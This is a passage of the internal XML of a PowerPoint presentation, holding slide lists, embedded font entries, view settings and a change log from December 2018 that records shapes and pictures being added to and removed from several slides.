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7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1" r:id="rId3"/>
    <p:sldId id="302" r:id="rId4"/>
    <p:sldId id="282" r:id="rId5"/>
    <p:sldId id="303" r:id="rId6"/>
    <p:sldId id="309" r:id="rId7"/>
    <p:sldId id="304" r:id="rId8"/>
    <p:sldId id="308" r:id="rId9"/>
    <p:sldId id="310" r:id="rId10"/>
    <p:sldId id="311" r:id="rId11"/>
    <p:sldId id="312" r:id="rId12"/>
    <p:sldId id="313" r:id="rId13"/>
    <p:sldId id="314" r:id="rId14"/>
    <p:sldId id="315" r:id="rId15"/>
    <p:sldId id="306" r:id="rId16"/>
    <p:sldId id="305" r:id="rId17"/>
    <p:sldId id="307" r:id="rId18"/>
    <p:sldId id="280" r:id="rId19"/>
    <p:sldId id="281" r:id="rId20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23"/>
      <p:bold r:id="rId24"/>
      <p:italic r:id="rId25"/>
      <p:boldItalic r:id="rId26"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Muli" pitchFamily="2" charset="77"/>
      <p:regular r:id="rId27"/>
      <p:bold r:id="rId28"/>
      <p:italic r:id="rId29"/>
      <p:boldItalic r:id="rId30"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Nixie One" panose="02000503080000020004" pitchFamily="2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ego Maeoka" initials="DM" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="Diego Maeok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B270F1-05AB-AF4B-A248-BBB2FB11A77E}" v="32" dt="2018-12-18T18:09:12.315"/>
  </p1510:revLst>
</p1510:revInfo>
</file>

<file path=ppt/tableStyles.xml><?xml version="1.0" encoding="utf-8"?>
<a:tblStyleLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" def="{8CB8C6C1-08A5-45D5-AB1F-4394B18F5ADE}">
  <a:tblStyle styleId="{8CB8C6C1-08A5-45D5-AB1F-4394B18F5A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4"/>
    <p:restoredTop sz="94754"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="139" d="100"/>
          <a:sy n="139" d="100"/>
        </p:scale>
        <p:origin x="76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2" d="100"/>
          <a:sy n="122" d="100"/>
        </p:scale>
        <p:origin x="386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EGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}"/>
    <pc:docChg chg="undo redo custSel addSld delSld modSld">
      <pc:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:09:12.315" v="81"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-17T05:40:13.599" v="22"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="281"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-17T05:40:13.599" v="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="281"/>
            <ac:spMk id="551" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modNotesTx">
        <pc:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-15T03:52:06.753" v="0" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1220803407" sldId="282"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp modNotesTx">
        <pc:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-17T04:22:07.415" v="4" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3443541146" sldId="303"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-15T03:52:25.949" v="1" actId="2085"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3443541146" sldId="303"/>
            <ac:spMk id="362" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modNotesTx">
        <pc:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-17T04:22:21.455" v="6" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1069368179" sldId="304"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp modNotesTx">
        <pc:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-17T04:22:35.316" v="8" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3625788177" sldId="305"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-15T03:52:48.845" v="2" actId="2085"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3625788177" sldId="305"/>
            <ac:spMk id="362" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modNotesTx">
        <pc:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-17T04:22:29.015" v="7" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="375561472" sldId="306"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modNotesTx">
        <pc:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-17T04:22:40.536" v="9" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3880058936" sldId="307"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modNotesTx">
        <pc:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-17T04:21:54.174" v="3" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3479320129" sldId="308"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modNotesTx">
        <pc:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-17T04:22:12.754" v="5" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="416131970" sldId="309"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add delAnim">
        <pc:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:52:38.868" v="40" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="225244787" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:52:24.188" v="34" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="225244787" sldId="310"/>
            <ac:spMk id="8" creationId="{287A80D2-84D8-354F-A465-6D435547149A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:52:32.740" v="35" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="225244787" sldId="310"/>
            <ac:spMk id="11" creationId="{D8BA0A09-3A8C-4443-B038-28CD80D3510A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:52:23.301" v="33" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="225244787" sldId="310"/>
            <ac:spMk id="14" creationId="{C1116F84-1E60-EB46-94C7-75994B473C3B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:52:38.868" v="40" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="225244787" sldId="310"/>
            <ac:spMk id="17" creationId="{86E0C7CB-D007-FB41-B42B-D258715F3540}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:52:34.812" v="36" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="225244787" sldId="310"/>
            <ac:spMk id="20" creationId="{14D40A9E-EB09-724B-AD31-AD532E2485F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:52:15.012" v="32" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="225244787" sldId="310"/>
            <ac:picMk id="7" creationId="{F36BAECD-E33C-3248-B521-4BD1DCFD29EF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:52:12.941" v="31" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="225244787" sldId="310"/>
            <ac:picMk id="10" creationId="{99E85887-514D-A544-B7B8-DEE0BD6730EA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:52:10.214" v="30" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="225244787" sldId="310"/>
            <ac:picMk id="13" creationId="{9F7F073D-6DFE-0744-9D25-913E8980AAC7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:52:07.536" v="29" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="225244787" sldId="310"/>
            <ac:picMk id="16" creationId="{7B71B858-1B09-314F-AE5D-FD022EDFA01A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:52:06.155" v="28" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="225244787" sldId="310"/>
            <ac:picMk id="19" creationId="{B919FDA8-C4A6-FE4B-B3FF-0E5DBC23A4A3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp add delAnim modAnim">
        <pc:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:54:37.707" v="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2405746461" sldId="311"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:54:34.987" v="45"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2405746461" sldId="311"/>
            <ac:spMk id="8" creationId="{287A80D2-84D8-354F-A465-6D435547149A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:54:27.371" v="44"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2405746461" sldId="311"/>
            <ac:spMk id="11" creationId="{D8BA0A09-3A8C-4443-B038-28CD80D3510A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:54:20.709" v="43" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2405746461" sldId="311"/>
            <ac:spMk id="14" creationId="{C1116F84-1E60-EB46-94C7-75994B473C3B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:54:14.156" v="42" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2405746461" sldId="311"/>
            <ac:spMk id="17" creationId="{86E0C7CB-D007-FB41-B42B-D258715F3540}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:54:37.707" v="47"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2405746461" sldId="311"/>
            <ac:spMk id="18" creationId="{B8482738-C39B-384F-829D-E70D33874FE2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:54:07.828" v="41" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2405746461" sldId="311"/>
            <ac:spMk id="20" creationId="{14D40A9E-EB09-724B-AD31-AD532E2485F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:54:36.714" v="46" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2405746461" sldId="311"/>
            <ac:picMk id="5" creationId="{BF902C7D-399A-B04A-9166-05FD6F044AB5}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:54:34.987" v="45"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2405746461" sldId="311"/>
            <ac:picMk id="7" creationId="{F36BAECD-E33C-3248-B521-4BD1DCFD29EF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:54:27.371" v="44"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2405746461" sldId="311"/>
            <ac:picMk id="10" creationId="{99E85887-514D-A544-B7B8-DEE0BD6730EA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:54:20.709" v="43" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2405746461" sldId="311"/>
            <ac:picMk id="13" creationId="{9F7F073D-6DFE-0744-9D25-913E8980AAC7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:54:37.707" v="47"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2405746461" sldId="311"/>
            <ac:picMk id="15" creationId="{7E827AD9-70E3-7148-A7BC-24648C6D794A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:54:14.156" v="42" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2405746461" sldId="311"/>
            <ac:picMk id="16" creationId="{7B71B858-1B09-314F-AE5D-FD022EDFA01A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T17:54:07.828" v="41" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2405746461" sldId="311"/>
            <ac:picMk id="19" creationId="{B919FDA8-C4A6-FE4B-B3FF-0E5DBC23A4A3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp add delAnim modAnim">
        <pc:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:00:27.752" v="53"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="687388233" sldId="312"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:00:26.714" v="52" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="687388233" sldId="312"/>
            <ac:spMk id="8" creationId="{287A80D2-84D8-354F-A465-6D435547149A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:00:23.086" v="51"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="687388233" sldId="312"/>
            <ac:spMk id="11" creationId="{D8BA0A09-3A8C-4443-B038-28CD80D3510A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:00:17.117" v="50"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="687388233" sldId="312"/>
            <ac:spMk id="14" creationId="{C1116F84-1E60-EB46-94C7-75994B473C3B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:00:11.250" v="49" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="687388233" sldId="312"/>
            <ac:spMk id="17" creationId="{86E0C7CB-D007-FB41-B42B-D258715F3540}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:00:27.752" v="53"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="687388233" sldId="312"/>
            <ac:spMk id="18" creationId="{BB3B4035-6881-9B42-9237-0F3C943CD505}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:00:08.242" v="48" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="687388233" sldId="312"/>
            <ac:spMk id="20" creationId="{14D40A9E-EB09-724B-AD31-AD532E2485F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:00:26.714" v="52" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="687388233" sldId="312"/>
            <ac:picMk id="5" creationId="{BF902C7D-399A-B04A-9166-05FD6F044AB5}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:00:26.714" v="52" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="687388233" sldId="312"/>
            <ac:picMk id="7" creationId="{F36BAECD-E33C-3248-B521-4BD1DCFD29EF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:00:23.086" v="51"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="687388233" sldId="312"/>
            <ac:picMk id="10" creationId="{99E85887-514D-A544-B7B8-DEE0BD6730EA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:00:17.117" v="50"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="687388233" sldId="312"/>
            <ac:picMk id="13" creationId="{9F7F073D-6DFE-0744-9D25-913E8980AAC7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:00:27.752" v="53"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="687388233" sldId="312"/>
            <ac:picMk id="15" creationId="{937CDCF6-EEA1-0641-909C-57D622DE3DE5}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:00:11.250" v="49" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="687388233" sldId="312"/>
            <ac:picMk id="16" creationId="{7B71B858-1B09-314F-AE5D-FD022EDFA01A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:00:08.242" v="48" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="687388233" sldId="312"/>
            <ac:picMk id="19" creationId="{B919FDA8-C4A6-FE4B-B3FF-0E5DBC23A4A3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp add del addAnim delAnim modAnim">
        <pc:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:07:26.913" v="76"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3016821469" sldId="313"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:06:17.781" v="67" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3016821469" sldId="313"/>
            <ac:spMk id="8" creationId="{287A80D2-84D8-354F-A465-6D435547149A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="DIEGO KIYOSHI MAEOKA" userId="16103456-2478-4600-92fe-4323159bd784" providerId="ADAL" clId="{3FB270F1-05AB-AF4B-A248-BBB2FB11A77E}" dt="2018-12-18T18:07:26.319" v="75" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3016821469" sldId="313"/>
            <ac:spMk id="11" creationId="{D8BA0A09-3A8C-4443-B038-28CD80D3510A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
